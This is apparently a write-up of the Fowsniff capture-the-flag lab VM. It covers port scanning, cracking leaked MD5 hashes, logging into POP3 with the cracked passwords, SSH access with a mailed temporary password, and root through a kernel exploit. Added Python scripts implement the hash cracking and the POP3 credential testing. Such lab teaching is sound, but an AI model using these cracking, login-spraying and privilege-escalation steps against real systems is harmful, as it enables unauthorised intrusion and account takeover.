Fowsniff Walkthrough

Description

I created this boot2root last year to be hosted on Peerlyst.com. It’s beginner level, but requires more than just an exploitdb search or metasploit to run.
It was created in (and is intended to be used with) VirtualBox, and takes some extra configuration to set up in VMWare.
Download it from here: Fowsniff on Vulnhub

Port scanning

The nmap port scan resulted in the following output:

root@kali:~/Downloads# nmap -A -sC -p- 192.168.43.90
Nmap scan report for fowsniff (192.168.43.90)
Host is up (0.00052s latency).
Not shown: 65531 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 90:35:66:f4:c6:d2:95:12:1b:e8:cd:de:aa:4e:03:23 (RSA)
|   256 53:9d:23:67:34:cf:0a:d5:5a:9a:11:74:bd:fd:de:71 (ECDSA)
|_  256 a2:8f:db:ae:9e:3d:c9:e6:a9:ca:03:b1:d7:1b:66:83 (ED25519)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
| http-server-header: Apache/2.4.18 (Ubuntu)
| http-title: Fowsniff Corp - Delivering Solutions
110/tcp open  pop3    Dovecot pop3d
| pop3-capabilities: CAPA RESP-CODES USER TOP SASL(PLAIN) PIPELINING AUTH-RESP-CODE UIDL
143/tcp open  imap    Dovecot imapd
|_imap-capabilities: capabilities IMAP4rev1 listed more LOGIN-REFERRALS OK have ENABLE post-login ID SASL-IR IDLE Pre-login AUTH=PLAINA0001 LITERAL+
MAC Address: 08:00:27:66:85:17 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.52 ms fowsniff (192.168.43.90)

First I looked at the web server. It served a single page announcing that the site is out of service because the corporation has been hacked (nmap also flagged a robots.txt with one disallowed entry, which is always worth a look on a target, though it was not needed here):

The attackers were also able to hijack our official @fowsniffcorp Twitter account. All of our official tweets have been deleted and the attackers may release sensitive information via this medium. We are working to resolve this as soon as possible.

Finding the hashes

A quick search on Twitter revealed the hijacked Fowsniff account. One of the tweets linked to a pastebin paste containing the dumped hashes. Here is what the paste contained:

FOWSNIFF CORP PASSWORD LEAK
            ''~``
           ( o o )
+-----.oooO--(_)--Oooo.------+
|                            |
|          FOWSNIFF          |
|            got             |
|           PWN3D!!!         |
|                            |         
|       .oooO                |         
|        (   )   Oooo.       |         
+---------\ (----(   )-------+
           \_)    ) /
                 (_/
FowSniff Corp got pwn3d by B1gN1nj4!
No one is safe from my 1337 skillz!


mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e

Fowsniff Corporation Passwords LEAKED!
FOWSNIFF CORP PASSWORD DUMP!

Here are their email passwords dumped from their databases.
They left their pop3 server WIDE OPEN, too!

MD5 is insecure, so you shouldn't have trouble cracking them but I was too lazy haha =P

l8r n00bz!

B1gN1nj4

Cracking the hashes

I copied the nine user:hash lines into dump.txt and ran john against them in its default modes (no wordlist given), but it only cracked 6 of the 9.

root@kali:~/Downloads# john --format=RAW-MD5 dump.txt
Using default input encoding: UTF-8
Loaded 9 password hashes with no different salts (Raw-MD5 [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
scoobydoo2       (seina@fowsniff)
apples01         (tegel@fowsniff)
bilbo101         (mustikka@fowsniff)
skyler22         (baksteen@fowsniff)
07011972         (sciana@fowsniff)
mailcall         (mauer@fowsniff)

Next I tried an online lookup service, hashkiller.co.uk. That did a little better: only one hash (stone's) remained uncracked, which was good enough for me. One caveat for real engagements: submitting hashes to a third-party site discloses them to that site, so keep that for CTF material and crack client data locally (rockyou.txt with john or hashcat).

8a28a94a588a95b80163709ab4313aa4 MD5 : mailcall
ae1644dac5b77c0cf51e0d26ad6d7e56 MD5 : bilbo101
1dc352435fecca338acfd4be10984009 MD5 : apples01
19f5af754c31f1e2651edde9250d69bb MD5 : skyler22
90dc16d47114aa13671c697fd506cf26 MD5 : scoobydoo2
a92b8a29ef1183192e3d35187e0cfabd [Not found]
0e9588cb62f4b6f27e33d449e2ba0b3b MD5 : carp4ever
4d6e42f56e127803285a0a7649b5ab11 MD5 : orlando12
f7fd98d380735e859f8b2ffbbede5a7e MD5 : 07011972
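To show what john and hashkiller are doing with this paste, here is an added example (my code, not part of the original walkthrough or the box) that parses the leaked user@host:hash lines, skips the surrounding chatter, and runs a dictionary attack over a constructed stand-in wordlist. The wordlist is an assumption for the demo: a few decoys plus the plaintexts recovered above; against a real leak you would stream rockyou.txt instead. Because the hashes are unsalted MD5, each candidate is hashed once and looked up for all nine users at the same time, which is exactly why an unsalted dump cracks so cheaply.

```python
import hashlib
import re

# The user@host:md5 lines exactly as quoted from the paste, with one line of
# the attacker's chatter kept in to show the parser ignoring it.
LEAK = """\
FowSniff Corp got pwn3d by B1gN1nj4!
mauer@fowsniff:8a28a94a588a95b80163709ab4313aa4
mustikka@fowsniff:ae1644dac5b77c0cf51e0d26ad6d7e56
tegel@fowsniff:1dc352435fecca338acfd4be10984009
baksteen@fowsniff:19f5af754c31f1e2651edde9250d69bb
seina@fowsniff:90dc16d47114aa13671c697fd506cf26
stone@fowsniff:a92b8a29ef1183192e3d35187e0cfabd
mursten@fowsniff:0e9588cb62f4b6f27e33d449e2ba0b3b
parede@fowsniff:4d6e42f56e127803285a0a7649b5ab11
sciana@fowsniff:f7fd98d380735e859f8b2ffbbede5a7e
"""

# Constructed stand-in for a wordlist such as rockyou.txt (assumption for the
# demo): some decoys plus the plaintexts the walkthrough recovered.
WORDLIST = [
    "password", "123456", "fowsniff", "letmein", "qwerty", "B1gN1nj4",
    "mailcall", "bilbo101", "apples01", "skyler22",
    "scoobydoo2", "carp4ever", "orlando12", "07011972",
]

LINE_RE = re.compile(r"^(?P<user>[^@:\s]+)@(?P<host>[^:\s]+):(?P<hash>[0-9a-fA-F]{32})$")


def parse_leak(text):
    """Return {user: md5hex} for every well-formed line; ASCII art and chatter are skipped."""
    creds = {}
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            creds[m.group("user")] = m.group("hash").lower()
    return creds


def md5_hex(password):
    """Unsalted MD5 of the UTF-8 password, as stored in the leak."""
    return hashlib.md5(password.encode("utf-8")).hexdigest()


def crack(creds, wordlist):
    """Dictionary attack: hash each candidate once, look it up for every user at once.

    Returns {user: plaintext or None}. Users sharing a hash crack together,
    which is the price of no salt.
    """
    wanted = {}
    for user, h in creds.items():
        wanted.setdefault(h, []).append(user)
    found = {user: None for user in creds}
    for raw in wordlist:
        candidate = raw.rstrip("\r\n")       # wordlist files carry newlines
        for user in wanted.get(md5_hex(candidate), ()):
            found[user] = candidate
    return found


if __name__ == "__main__":
    results = crack(parse_leak(LEAK), WORDLIST)
    for user, pw in results.items():
        print(f"{user:10s} {pw if pw is not None else '[not cracked]'}")
```

To run it against a real wordlist, pass `open("/usr/share/wordlists/rockyou.txt", encoding="latin-1")` as the wordlist argument; the loop streams the file line by line. stone's hash stays uncracked here for the same reason it did on hashkiller: its plaintext is simply not in the list.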

The mail service

It was time to use these credentials. I telnetted to port 110 (the POP3 service) and tried each cracked password by hand rather than running a Metasploit login scanner against the service. The password for user seina was accepted:

root@kali:~# telnet 192.168.43.90 110
Trying 192.168.43.90...
Connected to 192.168.43.90.
Escape character is '^]'.
+OK Welcome to the Fowsniff Corporate Mail Server!
USER seina
+OK
PASS scoobydoo2
+OK Logged in.
list
+OK 2 messages:
1 1622
2 1280

As it turns out, the account has 2 messages, so let’s read them.
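The manual telnet session above, as an added example that is not part of the original walkthrough: a small poplib client that tries each cracked pair the way a login scanner would, one fresh session per attempt, then LISTs and RETRs the mailbox of whichever account is accepted. So that it runs offline, the block also carries a minimal fake POP3 server on loopback; its mailbox is constructed (placeholder bodies with the two subjects seen above) and, matching what happened on the box, only seina's password is accepted. Everything about that fake server is an assumption for the demo, not Dovecot's behaviour.

```python
import poplib
import socketserver
import threading

# Constructed fake mailbox (assumption for the demo, not the box's data):
# only seina's cracked password is accepted and the bodies are placeholders.
MAILBOX = {
    ("seina", "scoobydoo2"): [
        b"From: stone@fowsniff\r\nTo: seina@fowsniff\r\nSubject: URGENT! Security EVENT!\r\n\r\nplaceholder body 1\r\n",
        b"From: baksteen@fowsniff\r\nTo: seina@fowsniff\r\nSubject: You missed out!\r\n\r\nplaceholder body 2\r\n",
    ],
}

# The eight credentials recovered from the paste, paired as the paste paired them.
CANDIDATES = [
    ("mauer", "mailcall"), ("mustikka", "bilbo101"), ("tegel", "apples01"),
    ("baksteen", "skyler22"), ("seina", "scoobydoo2"), ("mursten", "carp4ever"),
    ("parede", "orlando12"), ("sciana", "07011972"),
]


class FakePop3Handler(socketserver.StreamRequestHandler):
    """Just enough POP3 (RFC 1939 USER/PASS/STAT/LIST/RETR/QUIT) to answer poplib."""

    def reply(self, text):
        self.wfile.write(text.encode() + b"\r\n")

    def handle(self):
        self.reply("+OK Welcome to the Fowsniff Corporate Mail Server!")
        user, msgs = None, None
        while True:
            raw = self.rfile.readline()
            if not raw:                                   # client went away
                return
            cmd, _, arg = raw.decode("utf-8", "replace").strip().partition(" ")
            cmd = cmd.upper()
            if cmd == "QUIT":
                self.reply("+OK Logging out.")
                return
            if cmd == "USER":                             # USER is +OK for any name
                user = arg
                self.reply("+OK")
            elif cmd == "PASS":                           # the real check happens here
                msgs = MAILBOX.get((user, arg))
                self.reply("+OK Logged in." if msgs is not None else "-ERR [AUTH] Authentication failed.")
            elif msgs is None:                            # not authenticated yet
                self.reply("-ERR Unknown command.")
            elif cmd == "STAT":
                self.reply(f"+OK {len(msgs)} {sum(len(m) for m in msgs)}")
            elif cmd == "LIST":
                self.reply(f"+OK {len(msgs)} messages:")
                for i, m in enumerate(msgs, 1):
                    self.reply(f"{i} {len(m)}")
                self.reply(".")
            elif cmd == "RETR" and arg.isdigit() and 1 <= int(arg) <= len(msgs):
                body = msgs[int(arg) - 1]
                self.reply(f"+OK {len(body)} octets")
                self.wfile.write(body + b".\r\n")         # body ends in CRLF, '.' terminates
            else:
                self.reply("-ERR Unknown command.")


def start_fake_server():
    """Bind the fake server on a free loopback port; return (server, port)."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakePop3Handler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def check_credentials(host, port, candidates, timeout=5):
    """One fresh session per pair; return [(user, password, message_count)] for accepted pairs."""
    accepted = []
    for user, password in candidates:
        conn = poplib.POP3(host, port, timeout=timeout)
        try:
            conn.user(user)
            conn.pass_(password)                          # raises error_proto on -ERR
            count, _ = conn.stat()
            accepted.append((user, password, count))
        except poplib.error_proto:
            pass
        finally:
            try:
                conn.quit()
            except (poplib.error_proto, OSError):
                conn.close()
    return accepted


def fetch_mailbox(host, port, user, password, timeout=5):
    """LIST, then RETR every message; return the messages as text."""
    conn = poplib.POP3(host, port, timeout=timeout)
    try:
        conn.user(user)
        conn.pass_(password)
        _, listing, _ = conn.list()
        messages = []
        for entry in listing:                             # entries look like b"1 1622"
            _, lines, _ = conn.retr(int(entry.split()[0]))
            messages.append(b"\r\n".join(lines).decode("utf-8", "replace"))
        return messages
    finally:
        conn.quit()


if __name__ == "__main__":
    server, port = start_fake_server()
    for user, password, count in check_credentials("127.0.0.1", port, CANDIDATES):
        print(f"{user}:{password} accepted, {count} message(s)")
        for msg in fetch_mailbox("127.0.0.1", port, user, password):
            print("   ", msg.splitlines()[2])             # the Subject: header
    server.shutdown()
```

Against the real box you would drop the fake server and call `check_credentials("192.168.43.90", 110, CANDIDATES)` directly. Note that every attempt is a separate TCP session: Dovecot, like most servers, drops or delays a connection after repeated PASS failures, so a scanner that reuses one session would stall after the first bad password.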

Reading the emails

Here is the first one:

retr 1
+OK 1622 octets
Return-Path: <stone@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
    id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,
    mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff,
    tegel@fowsniff
Subject: URGENT! Security EVENT!
Message-Id: <20180313185107.0FA3916A@fowsniff>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: stone@fowsniff (stone)

Dear All,

A few days ago, a malicious actor was able to gain entry to
our internal email systems. The attacker was able to exploit
incorrectly filtered escape characters within our SQL database
to access our login credentials. Both the SQL and authentication
system used legacy methods that had not been updated in some time.

We have been instructed to perform a complete internal system
overhaul. While the main systems are "in the shop," we have
moved to this isolated, temporary server that has minimal
functionality.

This server is capable of sending and receiving emails, but only
locally. That means you can only send emails to other users, not
to the world wide web. You can, however, access this system via
the SSH protocol.

The temporary password for SSH is "S1ck3nBluff+secureshell"

You MUST change this password as soon as possible, and you will do so under my
guidance. I saw the leak the attacker posted online, and I must say that your
passwords were not very secure.

Come see me in my office at your earliest convenience and we'll set it up.

Thanks,
A.J Stone

Okay… At this point I knew a temporary SSH password, but not which users had already changed it. The second message came to my rescue and revealed the sloppy user.

retr 2
+OK 1280 octets
Return-Path: <baksteen@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1004)
    id 101CA1AC2; Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
To: seina@fowsniff
Subject: You missed out!
Message-Id: <20180313185405.101CA1AC2@fowsniff>
Date: Tue, 13 Mar 2018 14:54:05 -0400 (EDT)
From: baksteen@fowsniff

Devin,

You should have seen the brass lay into AJ today!
We are going to be talking about this one for a looooong time hahaha.
Who knew the regional manager had been in the navy? She was swearing like a sailor!

I don't know what kind of pneumonia or something you brought back with
you from your camping trip, but I think I'm coming down with it myself.
How long have you been gone - a week?
Next time you're going to get sick and miss the managerial blowout of the century,
at least keep it to yourself!

I'm going to head home early and eat some chicken soup.
I think I just got an email from Stone, too, but it's probably just some
"Let me explain the tone of my meeting with management" face-saving mail.
I'll read it when I get back.

Feel better,

Skyler

PS: Make sure you change your email password.
AJ had been telling us to do that right before Captain Profanity showed up.

This message came from baksteen, and now I knew he had not even read Stone's email yet, let alone found the time to change his SSH password. A temporary password mailed to every user is effectively a shared credential, and it only takes one unread mailbox to expose it.

Getting SSH access

root@kali:~# ssh baksteen@192.168.43.90
baksteen@192.168.43.90's password:

                            _____                       _  __  __  
      :sdddddddddddddddy+  |  ___|____      _____ _ __ (_)/ _|/ _|  
   :yNMMMMMMMMMMMMMNmhsso  | |_ / _ \ \ /\ / / __| '_ \| | |_| |_   
.sdmmmmmNmmmmmmmNdyssssso  |  _| (_) \ V  V /\__ \ | | | |  _|  _|  
-:      y.      dssssssso  |_|  \___/ \_/\_/ |___/_| |_|_|_| |_|   
-:      y.      dssssssso                ____                      
-:      y.      dssssssso               / ___|___  _ __ _ __        
-:      y.      dssssssso              | |   / _ \| '__| '_ \     
-:      o.      dssssssso              | |__| (_) | |  | |_) |  _  
-:      o.      yssssssso               \____\___/|_|  | .__/  (_)
-:    .+mdddddddmyyyyyhy:                              |_|        
-: -odMMMMMMMMMMmhhdy/.    
.ohdddddddddddddho:                  Delivering Solutions


   ****  Welcome to the Fowsniff Corporate Server! ****

              ---------- NOTICE: ----------

 * Due to the recent security breach, we are running on a very minimal system.
 * Contact AJ Stone -IMMEDIATELY- about changing your email and SSH passwords.

baksteen@fowsniff:~$

I quickly looked around, but I didn’t find anything useful.

Enumeration

For enumeration my favourite bash script is LinEnum. You can download it from here: https://github.com/rebootuser/LinEnum
Its output is long, so I only show the relevant parts.

baksteen@fowsniff:/tmp$ wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
--2018-12-09 08:20:53--  https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.112.133, 64:ff9b::9765:7085
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.112.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 47585 (46K) [text/plain]
Saving to: ‘LinEnum.sh’

LinEnum.sh                100%[===================================>]  46.47K  --.-KB/s    in 0.08s   

2018-12-09 08:20:53 (605 KB/s) - "LinEnum.sh" saved [47585/47585]

baksteen@fowsniff:/tmp$ chmod +x LinEnum.sh
baksteen@fowsniff:/tmp$ ./LinEnum.sh

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.93

### SYSTEM ##############################################
[-] Kernel information:
Linux fowsniff 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

[-] Kernel information (continued):
Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609
  (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018

[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"
NAME="Ubuntu"
VERSION="16.04.4 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.4 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial

Getting root access

I didn't find anything unusual, so I checked the kernel version (4.4.0-116-generic on Ubuntu 16.04.4) and searched for a matching local privilege escalation. It didn't take long to find the right one.
Link: https://www.exploit-db.com/exploits/44298 (the Ubuntu 16.04.4 local root exploit for CVE-2017-16995, an eBPF verifier bug)
The target machine didn't have gcc installed, so I compiled the source on my Kali machine and copied the binary to the target's /tmp folder. Two caveats when doing this: build on a system whose glibc is no newer than the target's (or build with -static), otherwise the binary fails to load, and remember that kernel exploits can panic the box, so take a snapshot first.

root@kali:~/Downloads# gcc exploit.c -o exploit
root@kali:~/Downloads# scp exploit baksteen@192.168.43.90:/tmp
baksteen@192.168.43.90's password:
exploit

On the target machine, I executed the exploit…

baksteen@fowsniff:/tmp$ ./exploit
task_struct = ffff88001c045400
uidptr = ffff88001f266d84
spawning root shell
root@fowsniff:/tmp# id
uid=0(root) gid=0(root) groups=0(root),100(users),1001(baksteen)

and I got a root shell. Yaay!

The only thing left is printing the flag:

    ___                        _        _      _   _             _
  / __|___ _ _  __ _ _ _ __ _| |_ _  _| |__ _| |_(_)___ _ _  __| |
 | (__/ _ \ ' \/ _` | '_/ _` |  _| || | / _` |  _| / _ \ ' \(_-<_|
  \___\___/_||_\__, |_| \__,_|\__|\_,_|_\__,_|\__|_\___/_||_/__(_)
               |___/

 (_)
  |--------------
  |&&&&&&&&&&&&&&|
  |    R O O T   |
  |    F L A G   |
  |&&&&&&&&&&&&&&|
  |--------------
  |
  |
  |
  |
  |
  |
 ---

Nice work!

This CTF was built with love in every byte by @berzerk0 on Twitter.

Special thanks to psf, @nbulischeck and the whole Fofao Team.
